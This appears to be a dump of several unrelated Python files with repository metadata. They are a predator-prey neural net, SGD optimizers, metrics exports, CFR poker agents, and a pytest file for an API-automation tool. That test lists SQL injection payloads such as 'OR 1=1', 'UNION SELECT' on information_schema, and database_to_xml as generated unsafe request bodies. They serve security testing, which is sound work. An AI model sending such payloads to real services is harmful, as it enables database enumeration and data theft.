] | 7 | 2019-10-21T13:40:28.000Z | 2021-04-07T01:36:15.000Z | Zoo/neural_network_sense/nn_model.py | Tanmay-Kumar-Sinha/Evolution-Simulation | 1740c32320de7f8eab2780075f1161781eb520d1 | [
"MIT"
] | 13 | 2020-03-22T15:36:36.000Z | 2020-06-03T19:41:18.000Z | Zoo/neural_network_sense/nn_model.py | Tanmay-Kumar-Sinha/Evolution-Simulation | 1740c32320de7f8eab2780075f1161781eb520d1 | [
"MIT"
] | 4 | 2019-10-25T12:14:06.000Z | 2020-05-30T15:32:53.000Z | import numpy as np
"""
Simple model class for prey:
4 input neurons:
2 corresponding to the vector away from the closest predator
2 corresponding to the vector towards the closest food
4x2 hidden layers
2 output neurons corresponding to the direction of sense velocity prey should take
Takes input as the weights for neural-net
"""
class model_simple_prey():
def __init__(self, weights = np.random.uniform(-1,1,(4,10))):
self.weights = weights
def forward(self,x):
'''
x is a 4x1 vector
'''
x = np.tanh(self.weights[:,:4].T.dot(x))
x = np.tanh(self.weights[:,4:8].T.dot(x))
x = np.tanh(self.weights[:,8:].T.dot(x))
return x
def get_weights(self):
return self.weights
# def mutate(self):
# return self.weights + np.random.normal(0,1,self.weights.shape)
"""
Simple model class for predator:
2 input neurons corresponding to the vector towards the closest prey
2x2 hidden layers
2 output neurons corresponding to the direction of sense velocity predator should take
Takes input as the weights for neural-net
"""
class model_simple_predator():
def __init__(self, weights = np.random.uniform(-1,1,(2,6))):
self.weights = weights
def forward(self,x):
'''
x is a 4x1 vector
'''
x = np.tanh(self.weights[:,:2].T.dot(x))
x = np.tanh(self.weights[:,2:4].T.dot(x))
x = np.tanh(self.weights[:,4:].T.dot(x))
return x
def get_weights(self):
return self.weights
def mutate(self):
return self.weights + np.random.normal(0,1,self.weights.shape) | 27.322581 | 90 | 0.621015 | 251 | 1,694 | 4.135458 | 0.243028 | 0.169557 | 0.040462 | 0.063584 | 0.843931 | 0.818882 | 0.816956 | 0.737958 | 0.693642 | 0.626204 | 0 | 0.028022 | 0.262692 | 1,694 | 62 | 91 | 27.322581 | 0.803042 | 0.071429 | 0 | 0.434783 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.304348 | false | 0 | 0.043478 | 0.130435 | 0.652174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
0e259cdf584fab606e9f01d67b5b2454012c6a74 | 4,748 | py | Python | tests/batch_generation/test_generate_unsafe_bodies.py | ashton-szabo/api-automation-tools | 279e258623cfe919a4385e63f3badaed66a61561 | [
"MIT"
] | null | null | null | tests/batch_generation/test_generate_unsafe_bodies.py | ashton-szabo/api-automation-tools | 279e258623cfe919a4385e63f3badaed66a61561 | [
"MIT"
] | null | null | null | tests/batch_generation/test_generate_unsafe_bodies.py | ashton-szabo/api-automation-tools | 279e258623cfe919a4385e63f3badaed66a61561 | [
"MIT"
] | 4 | 2022-03-09T06:11:59.000Z | 2022-03-10T02:09:34.000Z | import pytest
import apiautomationtools.batch_generation.batch_generation as bg
pytestmark = pytest.mark.batch_generation
def test_generate_unsafe_bodies_sub_value():
body = {"field1": "value1", "field2": "2", "file": "file", "file2": "file2"}
unsafe_bodies = bg.generate_unsafe_bodies(body)
expected_bodies = [
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{"field1": "value1 '--", "field2": "2 '--"},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '--", "field2": "2 '--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{"field1": "value1 '+OR+1=1--", "field2": "2 '+OR+1=1--"},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
{
"field1": "value1 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
"field2": "2 ' and substr(version(),1,10) = 'PostgreSQL' and '1 -> OK",
},
{"field1": "value1 SELECT version() --", "field2": "2 SELECT version() --"},
{
"field1": "value1 select database_to_xml(true,true,'');",
"field2": "2 select database_to_xml(true,true,'');",
},
{
"field1": "value1 UNION SELECT * FROM information_schema.tables --",
"field2": "2 UNION SELECT * FROM information_schema.tables --",
},
]
assert unsafe_bodies == expected_bodies
| 45.653846 | 89 | 0.507372 | 481 | 4,748 | 4.891892 | 0.089397 | 0.188695 | 0.107097 | 0.113047 | 0.887378 | 0.887378 | 0.887378 | 0.887378 | 0.887378 | 0.887378 | 0 | 0.058615 | 0.288543 | 4,748 | 103 | 90 | 46.097087 | 0.637951 | 0 | 0 | 0.545455 | 1 | 0 | 0.598357 | 0.199242 | 0 | 0 | 0 | 0 | 0.010101 | 1 | 0.010101 | false | 0 | 0.020202 | 0 | 0.030303 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
0e88b430b24e7146cd760beda3d6cd92f875ac91 | 2,710 | py | Python | optimizers/sgd_optimizer.py | AIDRI/optimizer-using-numpy | 24bd6d746e3e7f21536ca7d88d4ff96912d6fb21 | [
"MIT"
] | 1 | 2021-02-09T19:47:40.000Z | 2021-02-09T19:47:40.000Z | optimizers/sgd_optimizer.py | AIDRI/optimizer-using-numpy | 24bd6d746e3e7f21536ca7d88d4ff96912d6fb21 | [
"MIT"
] | null | null | null | optimizers/sgd_optimizer.py | AIDRI/optimizer-using-numpy | 24bd6d746e3e7f21536ca7d88d4ff96912d6fb21 | [
"MIT"
] | null | null | null | class SGD_no_momentum():
def __init__(self, func, partial_derivative):
self.w = [-10, -1] #random value
self.e = 0.0005
self.func = func
self.partial_derivative = partial_derivative
    def theta_update(self, grads):
        self.w[0] -= self.e * grads[0]
        self.w[1] -= self.e * grads[1]
def train(self):
J_min = 0
J = self.func(self.w)
epochs = 0
print(J_min, J)
while abs(J_min - J) > 1e-8:
if epochs != 0:
J_min = J
J = self.func(self.w)
self.grad = self.partial_derivative(self.w)
self.theta_update(self.grad)
epochs += 1
if epochs%10==0:
print('Epochs : {} ; Cost : {}'.format(epochs, J))
print('Epochs : {} ; Cost : {}'.format(epochs, J))
print('Global Minima : {} ; {}'.format(self.w[0], self.w[1]))
class SGD_momentum():
def __init__(self, func, partial_derivative):
self.w = [2.5, 1.2] #random value
self.v = [0, 0]
self.e = 0.0001
self.func = func
self.partial_derivative = partial_derivative
def theta_update(self, grads):
self.v[0] = 0.9 * self.v[0] - self.e * grads[0]
self.w[0] += self.v[0]
self.v[1] = 0.9 * self.v[1] - self.e * grads[1]
self.w[1] += self.v[1]
def train(self):
J_min = 0
J = self.func(self.w)
epochs = 0
print(J_min, J)
while abs(J_min - J) > 1e-8:
if epochs != 0:
J_min = J
J = self.func(self.w)
self.grad = self.partial_derivative(self.w)
self.theta_update(self.grad)
epochs += 1
if epochs%500==0:
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Global Minima : {} ; {}'.format(self.w[0], self.w[1]))
class SGD_nesterov():
def __init__(self, func, partial_derivative):
self.w = [2.5, 1.2] #random value
self.v = [0, 0]
self.e = 0.0001
self.func = func
self.partial_derivative = partial_derivative
def theta_update(self, grads):
self.v[0] = 0.9 * self.v[0] - self.e * grads[0]
self.w[0] += self.v[0]
self.v[1] = 0.9 * self.v[1] - self.e * grads[1]
self.w[1] += self.v[1]
def train(self):
J_min = 0
J = self.func(self.w)
epochs = 0
print(J_min, J)
while abs(J_min - J) > 1e-8:
if epochs != 0:
J_min = J
J = self.func(self.w)
X_ = self.w[0] + 0.9 * self.v[0]
Y_ = self.w[1] + 0.9 * self.v[1]
W_ = [X_, Y_]
self.grad = self.partial_derivative(W_)
self.theta_update(self.grad)
epochs += 1
if epochs%500==0:
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Epochs : {} ; Cost : {} ; X : {} ; Y : {}'.format(epochs, J, self.w[0], self.w[1]))
print('Global Minima : {} ; {}'.format(self.w[0], self.w[1])) | 27.938144 | 94 | 0.577491 | 474 | 2,710 | 3.191983 | 0.094937 | 0.11236 | 0.043622 | 0.066094 | 0.933906 | 0.914739 | 0.902842 | 0.865829 | 0.865829 | 0.8308 | 0 | 0.052977 | 0.212915 | 2,710 | 97 | 95 | 27.938144 | 0.656353 | 0.013284 | 0 | 0.845238 | 0 | 0 | 0.104416 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107143 | false | 0 | 0 | 0 | 0.142857 | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
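# Usage sketch (hypothetical objective): minimise f(w) = w[0]**2 + w[1]**2,
# whose partial derivatives are [2*w[0], 2*w[1]]; any differentiable function
# plus a matching gradient callable can be plugged in the same way.
if __name__ == "__main__":
    func = lambda w: w[0] ** 2 + w[1] ** 2
    partial_derivative = lambda w: [2 * w[0], 2 * w[1]]
    optimizer = SGD_momentum(func, partial_derivative)
    optimizer.train()  # stops once |J_min - J| <= 1e-8, close to the minimum at (0, 0)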
7ef96eb3836e3e160d7c21cf050c4812ba632359 | 341 | py | Python | ngocbienml/metrics/__init__.py | ngocbien/ngocbienml | dcaa4707f5b513153e7be20538923e741894b2a2 | [
"MIT"
] | 1 | 2021-06-04T06:50:38.000Z | 2021-06-04T06:50:38.000Z | ngocbienml/metrics/__init__.py | ngocbien/ngocbienml | dcaa4707f5b513153e7be20538923e741894b2a2 | [
"MIT"
] | null | null | null | ngocbienml/metrics/__init__.py | ngocbien/ngocbienml | dcaa4707f5b513153e7be20538923e741894b2a2 | [
"MIT"
] | null | null | null | from .metrics_ import multiclass_score, binary_score, gini, confusion_matrix, binary_score_, binary_scoreKfold, find_best_threshold
__all__ = ["multiclass_score",
"binary_score",
"gini",
"confusion_matrix",
"binary_score_",
"binary_scoreKfold",
"find_best_threshold"] | 42.625 | 133 | 0.642229 | 32 | 341 | 6.1875 | 0.4375 | 0.222222 | 0.212121 | 0.262626 | 0.89899 | 0.89899 | 0.89899 | 0.89899 | 0.89899 | 0.89899 | 0 | 0 | 0.269795 | 341 | 8 | 134 | 42.625 | 0.795181 | 0 | 0 | 0 | 0 | 0 | 0.289552 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
7d002e3cfd2a3bd1815aa90bf4d5d2881783b5ae | 28,436 | py | Python | rlcard/agents/MCCFR_agents.py | aditya140/rlcard | de203b9b74a653019452aeb0622345f33dd42eda | [
"MIT"
] | null | null | null | rlcard/agents/MCCFR_agents.py | aditya140/rlcard | de203b9b74a653019452aeb0622345f33dd42eda | [
"MIT"
] | null | null | null | rlcard/agents/MCCFR_agents.py | aditya140/rlcard | de203b9b74a653019452aeb0622345f33dd42eda | [
"MIT"
] | null | null | null | import numpy as np
import collections
import os
import pickle
from rlcard.utils.utils import *
class ChanceSampling_CFR:
"""Implementation of CFR algorithm"""
def __init__(self, env, model_path="./ChanceSampling_cfr_model"):
"""Initialize Model
Args:
            env : Env Class
            model_path (str, optional): directory where model files are saved. Defaults to './ChanceSampling_cfr_model'.
"""
self.use_raw = False
self.env = env
self.model_path = model_path
# Policy = σ
# A policy is a dict state_str -> action probability
self.policy = collections.defaultdict(list)
# average_policy = s
self.average_policy = collections.defaultdict(np.array)
# Regret is a dict state_str -> action regrets
self.regrets = collections.defaultdict(np.array)
self.iteration = 0
def train(self):
""" One iteration of CRF"""
self.iteration += 1
# Firstly, traverse tree to compute counterfactual regret for each player
# The regrets are recorded in traversal
for player_id in range(self.env.player_num):
self.env.reset()
# probs = π
probs = np.ones(self.env.player_num)
self.traverse_tree(probs, player_id)
# Update policy
self.update_policy()
def traverse_tree(self, probs, player_id):
"""
if terminal node return utility = payoff
"""
if self.env.is_over():
return self.env.get_payoffs()
current_player = self.env.get_player_id()
# action_utilities = v_σ(I->a)
action_utilities = {}
# state_utility = v_σ
state_utility = np.zeros(self.env.player_num)
# obs = h, legal_actions = A(I)
obs, legal_actions = self.get_state(current_player)
# action probs = σ(I,.)
action_probs = self.action_probs(obs, legal_actions, self.policy)
"""
σ^t(I) <- RegretMatching(r_I)
v_σ <- 0
v_σ_(I->a)[a] <- 0 for all a ∈ A(I)
"""
for action in legal_actions:
# action prob = σ(I,a)
action_prob = action_probs[action]
new_probs = probs.copy()
# σ(I,a) * π
new_probs[current_player] *= action_prob
# Keep traversing the child state
# Each chance node is sampled internally by the environment
self.env.step(action)
# Utility = v_σ(I->a)[a]
utility = self.traverse_tree(new_probs, player_id)
self.env.step_back()
# State utility = v_σ
# v_σ = v_σ + σ(I,a)*v_σ(I->a)[a]
state_utility += action_prob * utility
action_utilities[action] = utility
"""
if P(h) != i:
return v_σ
"""
if not current_player == player_id:
return state_utility
"""
if P(h) == i:
for a ∈ A(I):
r_I[a] <- r_I[a] + π_(-i) (v_σ(I->a)[a] - v_σ)
s[I,a] <- s[I,a] + iter * π_(i) * σ(I,a)
"""
# If it is current player, we record the policy and compute regret
# player_prob = π_(i)
player_prob = probs[current_player]
# counterfactual_prob = π_(-i)
counterfactual_prob = np.prod(probs[:current_player]) * np.prod(
probs[current_player + 1 :]
)
# player_state_utility = v_σ
player_state_utility = state_utility[current_player]
if obs not in self.regrets:
# regret to be initialized as 0 for each action
self.regrets[obs] = np.zeros(self.env.action_num)
if obs not in self.average_policy:
# Average policy initialized as 0 for each legal state and action pair
self.average_policy[obs] = np.zeros(self.env.action_num)
for action in legal_actions:
# action prob = σ(I,a)
action_prob = action_probs[action]
# regret = π_(-i) * (v_σ(I->a)[a] - v_σ)
regret = counterfactual_prob * (
action_utilities[action][current_player] - player_state_utility
)
# r[I,a] = r[I,a] + π_(-i) * (v_σ(I->a)[a] - v_σ)
self.regrets[obs][action] += regret
# s[I,a] = s[I,a] + iter * π_(i) * σ(I,a)
self.average_policy[obs][action] += player_prob * action_prob
# return v_σ
return state_utility
def regret_matching(self, obs):
"""Regret Matching using
{ R^T,+(I,a) / Σ_a (R)^T,+(I,a) if Σ_a (R)^T,+(I,a)>0
σ^(T+1) (I,a) = {
{ 1/|A(I)| else
Args:
obs (string):
Returns:
action_probability
"""
regret = self.regrets[obs]
# positive_regret_sum = Σ_a (R)^T,+(I,a)
positive_regret_sum = sum([r for r in regret if r > 0])
# action probs = σ^T+1 (I,.)
action_probs = np.zeros(self.env.action_num)
if positive_regret_sum > 0:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = R^T,+(I,a) / Σ_a (R)^T,+(I,a)
action_probs[action] = max(0.0, regret[action] / positive_regret_sum)
else:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = 1/|A(I)|
action_probs[action] = 1.0 / self.env.action_num
return action_probs
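    # Worked example of the matching rule above (illustrative numbers): with
    # cumulative regrets r_I = [3, -1, 1] over three actions, the positive
    # regret sum is 3 + 1 = 4, so σ^(T+1)(I, ·) = [3/4, 0, 1/4]; if no regret
    # were positive, the policy would fall back to uniform [1/3, 1/3, 1/3].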
def update_policy(self):
"""Update policy based on the current regrets"""
for obs in self.regrets:
self.policy[obs] = self.regret_matching(obs)
def action_probs(self, obs, legal_actions, policy):
"""Obtain the action probabilities of the current state
Args:
obs (str): state_str
legal_actions (list): List of leagel actions
player_id (int): The current player
policy (dict): The used policy
Returns:
(tuple) that contains:
action_probs(numpy.array): The action probabilities
legal_actions (list): Indices of legal actions
"""
if obs not in policy.keys():
action_probs = np.array(
[1.0 / self.env.action_num for _ in range(self.env.action_num)]
)
self.policy[obs] = action_probs
else:
action_probs = policy[obs]
action_probs = remove_illegal(action_probs, legal_actions)
return action_probs
def eval_step(self, state):
"""Given a state, predict action based on average policy
Args:
state (numpy.array): State representation
Returns:
action (int): Predicted action
"""
probs = self.action_probs(
state["obs"].tostring(), state["legal_actions"], self.average_policy
)
action = np.random.choice(len(probs), p=probs)
return action, probs
def get_state(self, player_id):
"""Get state_str of the player
Args:
player_id (int): The player id
Returns:
(tuple) that contains:
state (str): The state str
legal_actions (list): Indices of legal actions
"""
state = self.env.get_state(player_id)
return state["obs"].tostring(), state["legal_actions"]
def save(self):
"""Save model"""
if not os.path.exists(self.model_path):
os.makedirs(self.model_path)
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "wb")
pickle.dump(self.policy, policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "wb"
)
pickle.dump(self.average_policy, average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "wb")
pickle.dump(self.regrets, regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "wb")
pickle.dump(self.iteration, iteration_file)
iteration_file.close()
def load(self):
"""Load model"""
if not os.path.exists(self.model_path):
return
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "rb")
self.policy = pickle.load(policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "rb"
)
self.average_policy = pickle.load(average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "rb")
self.regrets = pickle.load(regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "rb")
self.iteration = pickle.load(iteration_file)
iteration_file.close()
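# Training sketch (assumption: an rlcard environment created with step-back
# support, e.g. rlcard.make('leduc-holdem', config={'allow_step_back': True});
# the exact make() signature may differ between rlcard versions). Kept as a
# comment so that importing this module stays side-effect free.
#
#     import rlcard
#     env = rlcard.make('leduc-holdem', config={'allow_step_back': True})
#     agent = ChanceSampling_CFR(env)
#     for _ in range(1000):
#         agent.train()
#     agent.save()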
class ExternalSampling_CFR:
"""Implementation of External Sampling CFR algorithm
External Sampling with Stochastically-Weighted Averaging
    Initialize: ∀I ∈ I, ∀a ∈ A(I): r_I[a] ← s_I[a] ← 0
    ExternalSampling(h, i):
        if h ∈ Z then return u_i(h)
        if P(h) = c then sample a′ and return ExternalSampling(ha′, i)
        Let I be the information set containing h
        σ(I) ← RegretMatching(r_I)
        if P(I) = i then
            Let u be an array indexed by actions and u_σ ← 0
            for a ∈ A(I) do
                u[a] ← ExternalSampling(ha, i)
                u_σ ← u_σ + σ(I, a) · u[a]
            for a ∈ A(I) do
                By Equation 4.20, compute r̃(I, a) ← u[a] − u_σ
                r_I[a] ← r_I[a] + r̃(I, a)
            return u_σ
        else
            Sample action a′ from σ(I)
            u ← ExternalSampling(ha′, i)
            for a ∈ A(I) do
                s_I[a] ← s_I[a] + σ(I, a)
            return u
"""
def __init__(self, env, model_path="./external_sampling_cfr_model"):
"""Initialize Model
Args:
            env : Env Class
            model_path (str, optional): directory where model files are saved. Defaults to './external_sampling_cfr_model'.
"""
self.use_raw = False
self.env = env
self.model_path = model_path
# Policy = σ
# A policy is a dict state_str -> action probability
self.policy = collections.defaultdict(list)
# average_policy = s
self.average_policy = collections.defaultdict(np.array)
# Regret is a dict state_str -> action regrets
self.regrets = collections.defaultdict(np.array)
self.iteration = 0
def train(self):
""" One iteration of CRF"""
self.iteration += 1
# Firstly, traverse tree to compute counterfactual regret for each player
# The regrets are recorded in traversal
for player_id in range(self.env.player_num):
self.env.reset()
self.traverse_tree(player_id)
# Update policy
self.update_policy()
def traverse_tree(self, player_id):
"""
if terminal node return utility = payoff
"""
if self.env.is_over():
return self.env.get_payoffs()
current_player = self.env.get_player_id()
# state_utility = v_σ
state_utility = np.zeros(self.env.player_num)
# obs = h, legal_actions = A(I)
obs, legal_actions = self.get_state(current_player)
if obs not in self.regrets:
# regret to be initialized as 0 for each action
self.regrets[obs] = np.zeros(self.env.action_num)
if obs not in self.average_policy:
# Average policy initialized as 0 for each legal state and action pair
self.average_policy[obs] = np.zeros(self.env.action_num)
# σ(I,.) = regret_matching(r_I)
self.policy[obs] = self.regret_matching(obs)
# action probs = σ(I,.)
action_probs = self.action_probs(obs, legal_actions, self.policy)
# if P(h) == i
if current_player == player_id:
# Let u be an array indexed by actions and u_σ <- 0
action_utility = {}
state_utility = np.zeros(self.env.player_num)
for action in legal_actions:
action_prob = action_probs[action]
self.env.step(action)
# u[a] <- ExternalSampling(ha,i)
utility = self.traverse_tree(player_id)
action_utility[action] = utility
self.env.step_back()
# u_σ += σ(I,a) * u[a]
state_utility += action_prob * utility
for action in legal_actions:
# player_state_utility = v_σ
player_state_utility = state_utility[current_player]
# r(I,a) <- u[a] - u_σ
regret = (
action_utility[action][current_player]
- state_utility[current_player]
)
# r_I[a] += r(I,a)
self.regrets[obs][action] += regret
return state_utility
        # if P(h) != i:
        else:
            # Sample the opponent's action a' from σ(I), as in the pseudocode above
            # (the original uniform random.choice also left `random` unimported)
            sampled_action = np.random.choice(
                range(self.env.action_num), p=action_probs
            )
self.env.step(sampled_action)
utility = self.traverse_tree(player_id)
self.env.step_back()
for action in legal_actions:
# s_I[a] += σ(I,a)
self.average_policy[obs][action] += action_probs[action]
return utility
def regret_matching(self, obs):
"""Regret Matching using
{ R^T,+(I,a) / Σ_a (R)^T,+(I,a) if Σ_a (R)^T,+(I,a)>0
σ^(T+1) (I,a) = {
{ 1/|A(I)| else
Args:
obs (string):
Returns:
action_probability
"""
regret = self.regrets[obs]
# positive_regret_sum = Σ_a (R)^T,+(I,a)
positive_regret_sum = sum([r for r in regret if r > 0])
# action probs = σ^T+1 (I,.)
action_probs = np.zeros(self.env.action_num)
if positive_regret_sum > 0:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = R^T,+(I,a) / Σ_a (R)^T,+(I,a)
action_probs[action] = max(0.0, regret[action] / positive_regret_sum)
else:
for action in range(self.env.action_num):
# σ^T+1 (I,a) = 1/|A(I)|
action_probs[action] = 1.0 / self.env.action_num
return action_probs
def update_policy(self):
"""Update policy based on the current regrets"""
for obs in self.regrets:
self.policy[obs] = self.regret_matching(obs)
def action_probs(self, obs, legal_actions, policy):
"""Obtain the action probabilities of the current state
Args:
obs (str): state_str
legal_actions (list): List of leagel actions
player_id (int): The current player
policy (dict): The used policy
Returns:
(tuple) that contains:
action_probs(numpy.array): The action probabilities
legal_actions (list): Indices of legal actions
"""
if obs not in policy.keys():
action_probs = np.array(
[1.0 / self.env.action_num for _ in range(self.env.action_num)]
)
self.policy[obs] = action_probs
else:
action_probs = policy[obs]
action_probs = remove_illegal(action_probs, legal_actions)
return action_probs
def eval_step(self, state):
"""Given a state, predict action based on average policy
Args:
state (numpy.array): State representation
Returns:
action (int): Predicted action
"""
probs = self.action_probs(
state["obs"].tostring(), state["legal_actions"], self.average_policy
)
action = np.random.choice(len(probs), p=probs)
return action, probs
def get_state(self, player_id):
"""Get state_str of the player
Args:
player_id (int): The player id
Returns:
(tuple) that contains:
state (str): The state str
legal_actions (list): Indices of legal actions
"""
state = self.env.get_state(player_id)
return state["obs"].tostring(), state["legal_actions"]
def save(self):
"""Save model"""
if not os.path.exists(self.model_path):
os.makedirs(self.model_path)
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "wb")
pickle.dump(self.policy, policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "wb"
)
pickle.dump(self.average_policy, average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "wb")
pickle.dump(self.regrets, regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "wb")
pickle.dump(self.iteration, iteration_file)
iteration_file.close()
def load(self):
"""Load model"""
if not os.path.exists(self.model_path):
return
policy_file = open(os.path.join(self.model_path, "policy.pkl"), "rb")
self.policy = pickle.load(policy_file)
policy_file.close()
average_policy_file = open(
os.path.join(self.model_path, "average_policy.pkl"), "rb"
)
self.average_policy = pickle.load(average_policy_file)
average_policy_file.close()
regrets_file = open(os.path.join(self.model_path, "regrets.pkl"), "rb")
self.regrets = pickle.load(regrets_file)
regrets_file.close()
iteration_file = open(os.path.join(self.model_path, "iteration.pkl"), "rb")
self.iteration = pickle.load(iteration_file)
iteration_file.close()
class OutcomeSampling_CFR:
"""Implementation of Outcome Sampling CFR algorithm
    Initialize: ∀I ∈ I: c_I ← 0
    Initialize: ∀I ∈ I, ∀a ∈ A(I): r_I[a] ← s_I[a] ← 0
    OutcomeSampling(h, i, t, π_i, π_-i, s):
        if h ∈ Z then return (u_i(h)/s, 1)
        if P(h) = c then sample a′ and return OutcomeSampling(ha′, i, t, π_i, π_-i, s)
        Let I be the information set containing h
        σ(I) ← RegretMatching(r_I)
        Let σ′(I) be a sampling distribution at I
        if P(I) = i then σ′(I) ← ε · Unif(I) + (1 − ε) · σ(I)
        else σ′(I) ← σ(I)
        Sample an action a′ with probability σ′(I, a)
        if P(I) = i then
            (u, π_tail) ← OutcomeSampling(ha′, i, t, π_i · σ(I, a), π_-i, s · σ′(I, a))
            for a ∈ A(I) do
                W ← u · π_-i
                Compute r̃(I, a) from Equation 4.12 if a = a′ else from Equation 4.15
                r_I[a] ← r_I[a] + r̃(I, a)
        else
            (u, π_tail) ← OutcomeSampling(ha′, i, t, π_i, π_-i · σ(I, a), s · σ′(I, a))
            for a ∈ A(I) do
                s_I[a] ← s_I[a] + (t − c_I) · π_-i · σ(I, a)
            c_I ← t
        return (u, π_tail · σ(I, a))
"""
    def __init__(self, env, epsilon=0.5, model_path="./OutcomeSampling_cfr_model"):
        """Initialize Model
        Args:
            env : Env Class
            epsilon (float, optional): exploration weight in the sampling distribution. Defaults to 0.5.
            model_path (str, optional): directory where model files are saved. Defaults to './OutcomeSampling_cfr_model'.
        """
self.use_raw = False
self.env = env
self.model_path = model_path
# Policy = σ
# A policy is a dict state_str -> action probability
self.policy = collections.defaultdict(list)
# average_policy = s
self.average_policy = collections.defaultdict(np.array)
# Regret is a dict state_str -> action regrets
self.regrets = collections.defaultdict(np.array)
# counter for each Information set
self.counter = {}
self.epsilon = epsilon
self.iteration = 0
def train(self):
""" One iteration of CRF"""
self.iteration += 1
# Firstly, traverse tree to compute counterfactual regret for each player
# The regrets are recorded in traversal
for player_id in range(self.env.player_num):
self.env.reset()
# probs = [π_i,π_-i]
probs = np.ones(self.env.player_num)
s = 1
self.traverse_tree(probs, player_id, s)
# Update policy
self.update_policy()
